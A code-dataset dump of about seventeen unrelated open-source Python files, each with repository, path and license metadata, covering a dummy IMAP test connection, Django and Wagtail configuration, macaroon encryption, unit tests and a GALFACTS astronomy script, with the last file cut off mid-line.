"MIME-Version: 1.0\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:52:47 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:52:47 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <101010101010100100000101010100010101010010100100000010@mail.example.com>\r\nSubject: spam2\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse, nurse!",
"MIME-Version: 1.0\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:54:54 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:54:54 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <1010101010101001000001010101000101010100101001000000101@mail.example.com>\r\nSubject: spamalot1\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse!\r\n\r\n\r\n",
"MIME-Version: 1.0\r\n\r\nReceived: by 10.140.91.199 with HTTP; Mon, 27 Jan 2014 13:54:54 -0800 (PST)\r\nDate: Mon, 27 Jan 2014 19:54:54 -0200\r\nDelivered-To: nurse@example.com\r\nMessage-ID: <101010101010100100000101010100010101010010100100000010101@mail.example.com>\r\nSubject: spamalot2\r\nFrom: Mr. Gumby <gumby@example.com>\r\nTo: The nurse <nurse@example.com>\r\nContent-Type: text/plain; charset=ISO-8859-1\r\n\r\nNurse! ... Nurse! ... Nurse!\r\n\r\n\r\n",
)
SPAM = {
"INBOX": [
{"uid": "483209", "headers": MESSAGES[0], "complete": MESSAGES[0], "flags": ""},
{"uid": "483211", "headers": MESSAGES[1], "complete": MESSAGES[1], "flags": ""},
{"uid": "483225", "headers": MESSAGES[2], "complete": MESSAGES[2], "flags": ""},
],
"Draft": [
{"uid": "483432", "headers": MESSAGES[3], "complete": MESSAGES[3], "flags": ""},
],
}
RESULTS = {
# <query string>: [<str uid> | <long id>, ...]
"INBOX": {"(ALL)": (1, 2, 3), "(1:3)": (1, 2, 3)},
"Draft": {"(1:1)": (1,)},
}
class Connection(object):
"""Dummy connection object for the imap client.
By default, uses the module SPAM and RESULT
sets (use Connection.setup for custom values)"""
def login(self, user, password):
pass
def __init__(self):
self._readonly = False
self._mailbox = None
self.setup()
def list(self):
return ("OK", ['(\\HasNoChildren) "/" "%s"' % key for key in self.spam])
def select(self, tablename, readonly=False):
self._readonly = readonly
"""args: mailbox, boolean
result[1][0] -> int last message id / mailbox lenght
result[0] = 'OK'
"""
self._mailbox = tablename
return ("OK", (len(SPAM[self._mailbox]), None))
def uid(self, command, uid, arg):
"""args:
command: "search" | "fetch"
uid: None | uid
parts: "(ALL)" | "(RFC822 FLAGS)" | "(RFC822.HEADER FLAGS)"
"search", None, "(ALL)" -> ("OK", ("uid_1 uid_2 ... uid_<mailbox length>", None))
"search", None, "<query>" -> ("OK", ("uid_1 uid_2 ... uid_n", None))
"fetch", uid, parts -> ("OK", (("<id> ...", "<raw message as specified in parts>"), "<flags>")
[0] [1][0][0] [1][0][1] [1][1]
"""
if command == "search":
return self._search(arg)
elif command == "fetch":
return self._fetch(uid, arg)
def _search(self, query):
return (
"OK",
(" ".join([str(item["uid"]) for item in self._get_messages(query)]), None),
)
def _fetch(self, value, arg):
try:
message = self.spam[self._mailbox][value - 1]
message_id = value
except TypeError:
for x, item in enumerate(self.spam[self._mailbox]):
if item["uid"] == value:
message = item
message_id = x + 1
break
parts = "headers"
if arg in ("(ALL)", "(RFC822 FLAGS)"):
parts = "complete"
return ("OK", (("%s " % message_id, message[parts]), message["flags"]))
def _get_messages(self, query):
| if query.strip().isdigit():
return [
self.spam[self._mailbox][int(query.strip()) - 1],
]
elif query[1 | :-1].strip().isdigit():
return [
self.spam[self._mailbox][int(query[1:-1].strip()) - 1],
]
elif query[1:-1].replace("UID", "").strip().isdigit():
for item in self.spam[self._mailbox]:
if item["uid"] == query[1:-1].replace("UID", "").strip():
return [
item,
]
messages = []
try:
for m in self.results[self._mailbox][query]:
try:
self.spam[self._mailbox][m - 1]["id"] = m
messages.append(self.spam[self._mailbox][m - 1])
except TypeError:
for x, item in enumerate(self.spam[self._mailbox]):
if item["uid"] == m:
item["id"] = x + 1
messages.append(item)
break
except IndexError:
# message removed
pass
return messages
except KeyError:
raise ValueError("The client issued an unexpected query: %s" % query)
def setup(self, spam={}, results={}):
"""adds custom message and query databases or sets
the values to the module defaults.
"""
self.spam = spam
self.results = results
if not spam:
for key in SPAM:
self.spam[key] = []
for d in SPAM[key]:
self.spam[key].append(d.copy())
if not results:
for key in RESULTS:
self.results[key] = RESULTS[key].copy()
|
finder/mako_base | urls.py | Python | mit | 770 | 0.018182 | from django.conf.urls.defaults import *
from django.conf import settings
import base
# Uncomment the next two lines to | enable the admin:
from django.contrib import admin
admin.autodiscover()
urlpatterns = patterns('',
# Example:
# (r'^quotes/', include('quotes.foo.urls')),
# Uncomment the admin/doc line below and add 'django.contrib.admindocs'
# to INSTALLED_APPS to enable admin documentation:
# (r'^admin/doc/', include('django.contrib.admindocs.urls')),
| # Uncomment the next line to enable the admin:
(r'^admin/', include(admin.site.urls)),
(r'^$', base.views.home),
)
if settings.DEBUG:
urlpatterns += patterns('',
(r'^media/(?P<path>.*)$','django.views.static.serve',{'document_root':settings.MEDIA_ROOT})
)
|
olysonek/tuned | tuned/plugins/__init__.py | Python | gpl-2.0 | 49 | 0 | from | .repository import *
from . import instance | |
allcaps/wagtail-robot-nao | wagtailrobot/home/models.py | Python | bsd-3-clause | 1,051 | 0.000951 | from __future__ import absolute_import, unicode_literals
from django import forms
from wagtail.wagtailadmin.edit_handlers import FieldPanel, StreamFieldPanel
from wagtail.wagtailcore.blocks import (
FieldBlock,
| RichTextBlock,
StreamBlock,
StructBlock,
)
from wagtail.wagtailcore.fields import StreamField
from wagtail.wagtailcore.models import Page as BasePage
from wagtail.wagtailimages.blocks import ImageChooserBlock
from wagtail.wagtailsearch import index
class ImageBlock(StructBlock):
image = ImageChooserBlock()
class Meta:
template = 'home/bl | ocks/image_block.html'
class webappStreamBlock(StreamBlock):
intro = RichTextBlock(icon="pilcrow")
paragraph = RichTextBlock(icon="pilcrow")
image = ImageBlock(label="Image", icon="image")
class Page(BasePage):
body = StreamField(webappStreamBlock())
search_fields = BasePage.search_fields + [
index.SearchField('body'),
]
Page.content_panels = [
FieldPanel('title', classname="full title"),
StreamFieldPanel('body'),
]
|
matrix-org/pymacaroons | pymacaroons/field_encryptors/secret_box_encryptor.py | Python | mit | 1,205 | 0 | from base64 import standard_b64encode, standard_b64decode
import nacl.bindings
import nacl.utils
from nacl.secret import SecretBox
from pymacaroons.field_encryptors.base_field_encryptor import (
BaseFieldEncryptor
)
from pymacaroons.utils import (
truncate_or_pad, convert_to_bytes, convert_to_string
)
class SecretBoxEncryptor(BaseFieldEncryptor):
def __init__(self, signifier=None, | nonce=None):
super(SecretBoxEncryptor, self).__init__(
signifier=signifier or 'sbe::'
)
self.nonce = nonce or nacl.utils.random(
nacl.bindings.crypto_secretbox_NONCEBYTES
)
def encrypt(self, signature, field_data):
encrypt_key = truncate_or_pad(signature)
box = SecretBox(key=encrypt_key)
encrypted = box.encrypt(convert_to_bytes(field_data), nonce=self.nonce)
return self._signi | fier + standard_b64encode(encrypted)
def decrypt(self, signature, field_data):
key = truncate_or_pad(signature)
box = SecretBox(key=key)
encoded = convert_to_bytes(field_data[len(self.signifier):])
decrypted = box.decrypt(standard_b64decode(encoded))
return convert_to_string(decrypted)
|
printedheart/h2o-3 | h2o-docs/src/booklets/v2_2015/source/deeplearning/deeplearning_inspect_model.py | Python | apache-2.0 | 369 | 0.00271 | # View | the specified parameters of your deep learning model
model.params
# Examine the performance of the trained model
model # display all performance metrics
model.model_performance(train=True) # training set metrics
model.model_performance(valid=True) # val | idation set metrics
# Get MSE only
model.mse(valid=True)
# Cross-validated MSE
model_cv.mse(xval=True) |
QuantCrimAtLeeds/PredictCode | tests/gui/tk/date_picker_test.py | Python | artistic-2.0 | 2,322 | 0.004737 | import pytest
import unittest.mock as mock
import datetime
import open_cp.gui.tk.date_picker as date_picker
@pytest.fixture
def dp():
with mock.patch("open_cp.gui.tk.date_picker._DatePickerView") as clazzmock:
yield date_picker.DatePicker()
def test_days_to_text(dp):
import locale
if locale.getdefaultlocale()[0][:2] != "en":
return
assert dp.day_to_text(0) == "Mon"
assert dp.day_to_text(1) == "Tue"
assert dp.day_to_text(2) == "Wed"
assert dp.day_to_text(3) == "Thu"
assert dp.day_to_text(4) == "Fri"
assert dp.day_to_text(5) == "Sat"
assert dp.day_to_text(6) == "Sun"
with pytest.raises(ValueError):
dp.day_to_text(-1)
with pytest.raises(ValueError):
dp.day_to_text(7)
def test_first_day_of_week(dp):
assert dp.first_day_of_week == "Mon"
dp.first_day_of_week = "Sun"
assert dp.first_day_of_week == "Sun"
dp._view.make_day_labels.assert_called_once_with()
dp._view.make_date_grid.assert_called_once_with()
with pytest.raises(ValueError):
dp.first_day_of_week = "Tue"
def test_month_year(dp):
now = datetime.datetime.now()
assert dp.month_year == (now.month, now.year)
dp.month_year = (1, 1987)
assert dp.month_year == (1, 1987)
dp._view.refresh_month_year.assert_called_once_with()
dp.month_year = ("12", "2023")
assert dp.month_year == (12, 2023)
with pytest.raises(ValueError):
dp.month_year = 5
with pytest.raises(ValueError):
dp.month_year = (0, 1987)
with pytest.raises(ValueError):
dp.month_year = (13, 1982)
def test_set_selected(dp):
d = datetime.date.today()
assert d == dp.selected_date
dp.selected_date = datetime.date(year=2011, month=5, day=23)
assert dp.selected_date == datetime.date(year=2011, month=5, day=23)
dp._view.refresh_month_year.assert_called_once_with()
with pytest.raises(ValueError):
dp.selected_date = 5
def test_command(dp):
cmd = mock.MagicMock()
dp.comm | and = cmd
d = datetime.date(year=2011, month=5, day | =23)
dp.selected_date = d
cmd.assert_called_once_with(d)
def test_set_colour(dp):
dp.selected_colour = "#aa66ff"
assert dp.selected_colour == "#aa66ff"
dp._view.make_date_grid.assert_called_once_with()
|
icoxfog417/pykintone | tests/test_comment.py | Python | apache-2.0 | 1,667 | 0.000612 | # -*- coding: utf-8 -*-
import unittest
import pykintone
from pykintone.model import kintoneModel
import tests.envs as envs
class TestAppModelSimple(kintoneModel):
def __init__(self):
super(TestAppModelSimple, self).__init__()
self.my_key = ""
self.stringField = ""
class TestComment(unittest.TestCase):
def test_comment(self):
app = pykintone.load(envs.FILE_PATH).app()
model = TestAppModelSimple()
model.my_key = "comment_test"
model.stringField = "comment_test_now"
result = app.create(model)
self.assertTrue(result.ok) # confirm create the record to test comment
_record_id = result.record_id
# create comment
r_created = app.comment(_record_id).create("コメントのテスト")
self.assertTrue(r_created.ok)
# it requires Administrator user is registered in kintone
r_created_m = app.comment(_record_id).create("メンションのテスト", [("Administ | rator", "USER")])
self.assertTrue(r_created_m.ok)
# select comment
r_selected = app.comment(_record_id).select(True, 0, 10)
self.assertTrue(r_selected.ok)
self.assertTrue(2, len(r_selected.raw_comments))
comments = r_selected.comments()
self.assertTru | e(1, len(comments[-1].mentions))
# delete comment
for c in comments:
r_deleted = app.comment(_record_id).delete(c.comment_id)
self.assertTrue(r_deleted.ok)
r_selected = app.comment(_record_id).select()
self.assertEqual(0, len(r_selected.raw_comments))
# done test
app.delete(_record_id)
|
gwpy/gwsumm | gwsumm/html/tests/test_static.py | Python | gpl-3.0 | 1,947 | 0 | # -*- coding: utf-8 -*-
# Copyright (C) Alex Urban (2019)
#
# This file is part of GWSumm.
#
# GWSumm is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GWSumm is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GWSumm. If not, see <http://www.gnu.org/licenses/>.
"""Unit tests for gwsumm.html.static
"""
__author__ = 'Alex Urban <alexander.urban@ligo.org>'
from collections import OrderedDict
from .. import static
# test simple utils
def test_get_css():
css = static.get_css()
assert isins | tance(css, OrderedDict)
# test dict keys
assert list( | css.keys()) == [
'font-awesome',
'font-awesome-solid',
'gwbootstrap',
]
# test list of files
css_files = list(x.split('/')[-1] for x in css.values())
assert css_files == [
'fontawesome.min.css',
'solid.min.css',
'gwbootstrap.min.css',
]
def test_get_js():
js = static.get_js()
assert isinstance(js, OrderedDict)
# test dict keys
assert list(js.keys()) == [
'jquery',
'jquery-ui',
'moment',
'bootstrap',
'fancybox',
'datepicker',
'gwbootstrap',
]
# test list of files
js_files = list(x.split('/')[-1] for x in js.values())
assert js_files == [
'jquery-3.5.1.min.js',
'jquery-ui.min.js',
'moment.min.js',
'bootstrap.bundle.min.js',
'jquery.fancybox.min.js',
'bootstrap-datepicker.min.js',
'gwbootstrap-extra.min.js',
]
|
bishalkc/portal-andino-theme | ckanext/gobar_theme/controller.py | Python | agpl-3.0 | 3,532 | 0.001699 | from ckan.controllers.home import HomeController
from ckan.controll | ers.api import ApiController
from ckan.common import c
import ckan.logic as logic
import ckan.model as model
import ckan.lib.base as base
import json
import ckan.plugins as p
from ckanext.googleanalytics.controller import GAApiController
class GobArHomeController(HomeController):
def _list_groups(self):
context = {
'mod | el': model,
'session': model.Session,
'user': c.user or c.author
}
data_dict_page_results = {
'all_fields': True,
'type': 'group',
'limit': None,
'offset': 0,
}
return logic.get_action('group_list')(context, data_dict_page_results)
def _featured_packages(self):
context = {
'model': model,
'session': model.Session,
'user': c.user or c.author,
'for_view': True
}
data_dict = {
'q': ''
}
search = logic.get_action('package_search')(context, data_dict)
if 'results' in search:
results = search['results']
featured_packages = []
for result in results:
for extra_pair in result['extras']:
if extra_pair['key'] == 'home_featured' and extra_pair['value'] == 'true':
featured_packages.append(result)
segmented_packages = [featured_packages[n:n + 2] for n in range(len(featured_packages))[::2]]
return segmented_packages
return []
def index(self):
c.groups = self._list_groups()
c.sorted_groups = sorted(c.groups, key=lambda x: x['display_name'].lower())
c.featured_packages = self._featured_packages()
return super(GobArHomeController, self).index()
def about(self):
return base.render('about.html')
def about_our_site(self):
return base.render('static/about_our_site.html')
def about_developers(self):
return base.render('static/about_developers.html')
def about_glossary(self):
return base.render('static/about_glossary.html')
class GobArApiController(GAApiController, ApiController):
def _remove_extra_id_field(self, json_string):
json_dict = json.loads(json_string)
has_extra_id = False
if 'result' in json_dict and 'fields' in json_dict['result']:
for field in json_dict['result']['fields']:
if 'id' in field and field['id'] == '_id':
has_extra_id = True
json_dict['result']['fields'].remove(field)
if has_extra_id and 'records' in json_dict['result']:
for record in json_dict['result']['records']:
if '_id' in record:
del record['_id']
return json.dumps(json_dict)
def action(self, logic_function, ver=None):
default_response = super(GobArApiController, self).action(logic_function, ver)
if logic_function == 'datastore_search':
default_response = self._remove_extra_id_field(default_response)
return default_response
def status(self):
context = {'model': model, 'session': model.Session}
data_dict = {}
status = logic.get_action('status_show')(context, data_dict)
gobar_status = logic.get_action('gobar_status_show')(context, data_dict)
status['gobar_artifacts'] = gobar_status
return self._finish_ok(status)
|
kusm/dnschecker | config.py | Python | mit | 750 | 0 | #! /usr/bin/env python
# coding:utf-8
# レコードファイルがあるディレクトリ
# デフォルトではこのスクリプトファイルが存在する
# ディレクトリにある zones/ 以下に配置する
zone_dir = "testzones"
# 生成した | HTML をおくディレクトリ
html_dir = "build"
# レコードに関する情報をおいているディレクトリ
record_info_dir = "testzones"
# A レコードのゾーンファイル名
a_record_filenames = [
"example.jp.zone",
]
# PTR レコードのゾーンファイル名そのネットワーク
ptr_record_filename_networks = [
('19 | 2.168.0.rev', '192.168.0.0/24'),
]
# レコード情報を納めたファイル
record_info_filenames = [
'192.168.0.info',
]
|
aserebryakov/godville-monitor-console | monitor/status_processing/__init__.py | Python | gpl-2.0 | 23 | 0 | from .r | ule import Rule | |
googleapis/python-bigquery | samples/magics/conftest.py | Python | apache-2.0 | 1,166 | 0 | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations und | er the License.
import pytest
interactiveshell = pytest.importorskip("IPython.terminal.interactiveshell")
tools = pytest.importorskip("IPython.testing.tools")
@pytest.fixture(scope="session")
def | ipython():
config = tools.default_config()
config.TerminalInteractiveShell.simple_prompt = True
shell = interactiveshell.TerminalInteractiveShell.instance(config=config)
return shell
@pytest.fixture(autouse=True)
def ipython_interactive(ipython):
"""Activate IPython's builtin hooks
for the duration of the test scope.
"""
with ipython.builtin_trap:
yield ipython
|
kf5grd/push2clip | setup.py | Python | gpl-3.0 | 357 | 0.014006 | from setuptools import setup
setup(
name='push2clip',
version='0.1',
py_modules=
['push2 | clip'],
install_requires=[
'Click',
'requests',
],
entry_points='''
[console_scripts]
push2clip=push2clip:cli
''',
)
| |
mahabs/nitro | nssrc/com/citrix/netscaler/nitro/resource/stat/pq/pq_stats.py | Python | apache-2.0 | 5,276 | 0.039803 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class pq_stats(base_resource) :
def __init__(self) :
self._clearstats = ""
self._pqtotalpolicymatches = 0
self._pqpolicymatchesrate = 0
self._pqtotalthresholdfailed = 0
self._pqthresholdfailedrate = 0
self._pqpriority1requests = 0
self._pqpriority1requestsrate = 0
self._pqpriority2requests = 0
self._pqpriority2requestsrate = 0
self._pqpriority3requests = 0
self._pqpriority3requestsrate = 0
@property
def clearstats(self) :
"""Clear the statsistics / counters.<br/>Possible values = basic, full.
"""
try :
return self._clearstats
except Exception as e:
raise e
@clearstats.setter
def clearstats(self, clearstats) :
"""Clear the statsistics / counters
"""
try :
self._clearstats = clearstats
except Exception as e:
raise e
@property
def pqpriority2requestsrate(self) :
"""Rate (/s) counter for pqpriority2requests.
"""
try :
return self._pqpriority2requestsrate
except Exception as e:
raise e
@property
def pqpolicymatchesrate(self) :
"""Rate (/s) counter for pqtotalpolicymatches.
"""
try :
return self._pqpolicymatchesrate
except Exception as e:
raise e
@property
def pqpriority1requestsrate(self) :
"""Rate (/s) counter for pqpriority1requests.
"""
try :
return self._pqpriority1requestsrate
except Exception as e:
raise e
@property
def pqthresholdfailedrate(self) :
"""Rate (/s) counter for pqtotalthresholdfailed.
"""
try :
return self._pqthresholdfailedrate
except Exception as e:
raise e
@property
def pqtotalpolicymatches(self) :
"""Number of times the Netscaler appliance matched an incoming request using any priority queuing policy.
"""
try :
return self._pqtotalpolicymatches
except Exception as e:
raise e
@property
def pqpriority1requests(self) :
"""Number of priority 1 requests that the Netscaler appliance received.
"""
try :
return self._pqpriority1requests
except Exception as e:
raise e
@property
def pqpriority3requestsrate(self) :
"""Rate (/s) counter for pqpriority3requests.
"""
try :
return self._pqpriority3requestsrate
except Exception as e:
raise e
@property
def pqpriority3requests(self) :
"""Number of priority 3 requests that the Netscaler appliance received.
"""
try :
return self._pqpriority3requests
except Exception as e:
raise e
@property
def pqpriority2requests(self) :
"""Number of priority 2 requests that the Netscaler appliance received.
"""
try :
return self._pqpriority2requests
except Exception as e:
raise e
@property
def pqtotalthresholdfailed(self) :
"""Number of times the Netscaler appliance failed to match an incoming request to any of priority queing policy.
"""
try :
return self._pqtotalthresholdfailed
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(pq_response, response, self.__class__.__name__.replace('_stats',''))
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.pq
except Exception as e :
raise e
def _get_object_name(self) :
""" Returns the value of object identifier argument
"""
try :
return None
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
""" Use this API to fetch the statistics of all pq_stats resources that are configured on netscaler.
"""
try :
obj = pq_stats()
if not name :
response = obj.stat_resources(service, option_)
return response
except Exception as e:
raise e
class Clearstat | s:
basic = "basic"
full = "full"
class pq_response(base_response) :
def __init__(self, length=1) :
self.pq = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.pq = [pq_stats() for _ | in range(length)]
|
rumblesan/diddy-vm | puff/tokens.py | Python | mit | 598 | 0 | #!/usr/bin/env python
def NUMBER(value):
return ("NUMBER", value)
def NAME(value):
return ("NAME", value)
def SYMBOL(value):
return ("SYMBOL", value)
def SEMICOLON():
return ("SEMICOLON", )
def OPENPAREN():
return ("OPENPAREN", | )
def CLOSEPAREN():
return ("CLOSEPAREN | ", )
def OPENBRACKET():
return ("OPENBRACKET", )
def CLOSEBRACKET():
return ("CLOSEBRACKET", )
def ASSIGNMENT():
return ("ASSIGNMENT", )
def EOF():
return ("EOF", )
def FUNCTIONDEF():
return ("FUNCTIONDEF", )
def FUNCTIONRETURN():
return ("FUNCTIONRETURN", )
|
beeryardtech/scripts | python/dk_test/libs/nodes.py | Python | apache-2.0 | 3,032 | 0.033971 | #-------------------------------------------------------------------------------
# Name: nodes
#-------------------------------------------------------------------------------
from __future__ import with_statement
__author__ = "Travis Goldie"
__email__ = "test_automation@us.sios.com"
__date__ = "11/14/12"
__copyright__ = "(c) SIOS Technology Corp 2012"
import sys
from dkutils import normjoin, cleanValue
class dknode():
def __init__(self, _config, _nodeName, _properties):
"""
Purpose:
Stores all the properties of a node.
Note:
-- Each node must have either a private IP or a public IP (or both)
-- Must include the corresponding submask for each IP
-- Vols/shareds can be either in a single delimited list:
volume="F,G,H"
or per line:
volume0="F"
volume1="G"
"""
self.properties = _properties
self.nodeName = _nodeName
self.config = _config
self.props = dict(( | propName.lower(), cleanValue(prop)) for
propName, prop in self.properties )
#If any of these props are in self.properties,
#create key and set to a default value (or to blank)
self.props["hostname"] = self.props.get("hostname", self.nodeName)
#List of possible names or IDs to id the node
self.system = [self.props.get("hostname"),
self.props.get("publicip"),
| self.props.get("privateip")]
self.volsformirror = self._loadVolsForMirror()
#self.sharedformirror = self._loadSharedForMirror()
self.allVols = self.volsformirror
pass
#---------------------------------------------------------------------------
# Local get functions
#---------------------------------------------------------------------------
def _loadVolsForMirror(self):
"""
Purpose:
Get the list of volumes (non-shared) from the properties dict
"""
return self._loadList("volume")
def _loadSharedForMirror(self):
"""
Purpose:
Get the list of shared volumes from the properties dict
"""
return self._loadList("sharedForMirror")
def _loadList(self, keyName):
"""
Purpose:
Gets list of volume letters. Must have at least one vol or shared vol.
Returns:
List of drive letters (strings)
"""
listResult = []
keyName = keyName.lower()
for key, val in self.props.items():
#If given in a delimited list, split on the the known delimiters
if key == keyName and val:
return config.splitAndLower(result)
#Build list for each line with the same name and ends in a digit
#See example in docstring of __init__
if key.startswith(keyName) and key[-1].isdigit() and val:
listResult.append(cleanValue(val))
if len(listResult) == 0:
return ''
else:
return [ result.lower() for result in listResult ]
if __name__ == "__main__":
config = dkconfig(r"c:\Programs\dk_test\tmp\cluster.ini.tmp")
config.runEnvSetup()
config.runFinalTearDown()
|
bozzzzo/quark | quarkc/test/emit/expected/py/int-methods/setup.py | Python | apache-2.0 | 242 | 0 | # Setup file for package int_methods
from setuptools | import setup
setup(name="int_methods",
version="0.0.1",
install_requires=["quark==0.0.1"],
py_modules=['int_met | hods'],
packages=['int_methods', 'int_methods_md'])
|
CiscoSystems/tempest | tempest/scenario/test_minimum_basic.py | Python | apache-2.0 | 5,548 | 0 | # Copyright 2013 NEC Corporation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.common import custom_matchers
from tempest import config
from tempest import exceptions
from tempest.openstack.common import log as logging
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestMinimumBasicScenario(manager.ScenarioTest):
"""
This is a basic minimum scenario test.
This test below:
* across the multiple components
* as a regular user
* with and without optional parameters
* check command outputs
"""
def _wait_for_server_status(self, status):
server_id = self.server['id']
# Raise on error defaults to True, which is consistent with the
# original function from scenario tests here
self.servers_client.wait_for_server_status(server_id, status)
def nova_keypair_add(self):
self.keypair = self.create_keypair()
def nova_boot(self):
create_kwargs = {'key_name': self.keypair['name']}
self.server = self.create_server(image=self.image,
create_kwargs=create_kwargs)
def nova_list(self):
_, servers = self.servers_client.list_servers()
# The list servers in the compute client is inconsistent...
servers = servers['servers']
self.assertIn(self.server['id'], [x['id'] for x in servers])
def nova_show(self):
_, got_server = self.servers_client.get_server(self.server['id'])
self.assertThat(
self.server, custom_matchers.MatchesDictExceptForKeys(
got_server, excluded_keys=['OS-EXT-AZ:availability_zone']))
def cinder_create(self):
self.volume = self.create_volume()
def cinder_list(self):
volumes = self.volumes_client.list_volumes()
self.assertIn(self.volume['id'], [x['id'] for x in volumes])
def cinder_show(self):
volume = self.volumes_client.get_volume(self.volume['id'])
self.assertEqual(self.volume, volume)
def nova_volume_attach(self):
volume_device_path = '/dev/' + CONF.compute.volume_device_name
volume = self.servers_client.attach_volume(
self.server['id'], self.volume['id'], volume_device_path)
self.assertEqual(self.volume['id'], volume['id'])
self.volumes_client.wait_for_volume_status(volume['id'], 'in-use')
# Refresh the volume after the attachment
self.volume = self.volumes_client.get_volume(volume['id'])
def nova_reboot(self):
self.servers_client.reboot(self.server['id'], 'SOFT')
self._wait_for_server_status('ACTIVE')
def check_partitions(self):
# NOTE(andreaf) The device name may be different on different guest OS
partitions = self.linux_client.get_partitions()
self.assertEqual(1, partitions.count(CONF.compute.volume_device_name))
def nova_volume_detach(self):
self.servers_client.detach_volume(self.server['id'], self.volume['id'])
self.volumes_client.wait_for_volume_status(self.volume['id'],
'available')
volume = self.volumes_client.get_volume(self.volume['id'])
self.assertEqual('available', volume['status'])
def create_and_add_security_group(self):
secgroup = self._create_security_group()
self.servers_client.add_security_group(self.server['id'],
secgroup['name'])
self.addCleanup(self.servers_client.remove_security_group,
self.server['id'], secgroup['name'])
def wait_for_secgroup_add():
_, body = self.servers_client.get_server(self.server['id'])
return {'name': secgroup['name']} in body['security_groups']
if not test.call_until_true(wait_for_secgroup_add,
CONF.compute.build_timeout,
CONF.compute.build_interval):
msg = ('Timed out waiting for adding security group %s to server '
'%s' % (secgroup['id'], self.server['id']))
raise exceptions.TimeoutException(msg)
@test.services('compute', 'volume', 'image', 'network')
def test_minimum_basic_scenario(self):
self.glance_image_create()
self.nova_keypair_add()
self.nova_boot()
self.nova_list()
self.nova_show()
self.cinder_create()
self.cinder_list()
self.cinder_show()
self.nova_volume_attach()
self.addCleanup(self.nova_volume_detach)
self.cinder_show()
self.floating_ip = self.create_floating_ip(self.server)
self.create_and_add_security_group()
self.linux_client = self.get_remote_client(self.floating_i | p['ip'])
self.nova_reboot()
self.linux_client = self.get_remote_client(self.floating_i | p['ip'])
self.check_partitions()
|
tvwenger/galfacts | find_sources.py | Python | mit | 6,373 | 0.01067 | """
find_sources.py
Find sources in GALFACTS transient search
03 June 2014 - Trey Wenger - creation
12 June 2014 - Trey Wenger - fixed smoothing convolution normalization
bug in beam.py
"""
vers = "v1.0.1"
import sys
import os
import argparse
import numpy as np
import beam
def main(**options):
"""Main script for finding GALFACTS sources"""
print("find_sources.py {0}".format(vers))
for b in options["beams"]:
if options["verbose"]:
print("Log: Starting beam {0} analysis.".format(b))
this_beam = beam.Beam(b, **options)
this_beam.find_sources()
if options["verbose"]:
print("Log: Done!")
if __name__ == "__main__":
parser=argparse.ArgumentParser(
description="Search GALFACTS for sources.",
prog='find_sources.py',
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument('--version', action='version',
version='%(prog)s '+vers)
required=parser.add_argument_group('required arguments:')
required.add_argument('--field',type=str,
help="field to analyze",
required=True)
required.add_argument('--date',type=int,
help="date to analyze",
required=True)
semi_opt=parser.add_argument_group('arguments set to defaults:')
semi_opt.add_argument('--data_filepath',type=str,
help='path where data are saved',
default="../data")
semi_opt.add_argument('--results_filepath',type=str,
help='path where results are saved',
default="../results")
semi_opt.add_argument('--beams',type=int,nargs="+",
help='beams to analyze',
default=[0,1,2,3,4,5,6])
semi_opt.add_argument('--ra_corr',typ | e=float,nargs=7,
help='RA beam location correction',
metavar=("BEAM0","BEAM1","BEAM2","BEAM3",
"BEAM4","BEAM5","BEAM6"),
